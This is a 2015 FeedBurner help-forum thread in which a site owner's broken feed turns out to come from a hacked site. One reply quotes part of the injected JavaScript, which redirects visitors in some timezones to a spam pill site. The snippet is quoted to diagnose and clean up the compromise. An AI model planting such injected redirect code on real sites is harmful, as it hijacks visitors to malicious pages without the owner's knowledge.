XML Error

Jose Figueroa

Apr 19, 2015, 12:22:54 PM4/19/15
to feedburner...@googlegroups.com
Hello,

How do I fix this error?

"The URL you entered does not appear to be a valid feed. We encountered the following problem: Error on line 6: The processing instruction target matching "[xX][mM][lL]" is not allowed."

The feed was working fine until a couple of weeks ago. I deleted the last 3 posts I created. Where do I go to reset/fix this problem?

Thanks.

Maks Verver

Apr 20, 2015, 4:34:53 AM4/20/15
to feedburner...@googlegroups.com
Hi Jose,

To get help with queries like these, it's useful to post your FeedBurner URL (http://feeds.feedburner.com/SOMETHING) and/or the URL of your source feed (http://yoursite.com/yourfeed.xml).

 - Maks.

Matti nescio

Apr 20, 2015, 6:26:37 AM4/20/15
to feedburner...@googlegroups.com
Fix the hack (javascript injection) in your figueroafinancial site.

Unescaped (and added space to URL) a portion of the long bit of javascript that you can see eg in http://feedvalidator.org/check.cgi?url=http://www.figueroafinancial.com/feed/
function offset()
{
now = new Date();
var $moscow_offset = 4;
var $current_offset = -(now.getTimezoneOffset()/60);
var $diff = $current_offset - $moscow_offset;
if ($diff == 6 || $diff <=-4) {
redirect_to("http://mens-sexual-tablets.  net/");
} else {
kuka();
location.replace('');
                }
}
function redirect_to(url) {
window.location.href = url;

Jose Figueroa

Apr 20, 2015, 7:33:09 AM4/20/15
to feedburner...@googlegroups.com

Jose Figueroa

Apr 20, 2015, 7:34:30 AM4/20/15
to feedburner...@googlegroups.com
Hi Matti,

How did you see this and how do I edit it?

Matti nescio

Apr 21, 2015, 5:27:12 AM4/21/15
On Monday, 20 April 2015 14:34:30 UTC+3, Jose Figueroa wrote:
Hi Matti,

How did you see this and how do I edit it?

Looks like you found it and removed it.

You may now want to take the necessary steps outlined
, to remove the 'This site may be hacked' warning in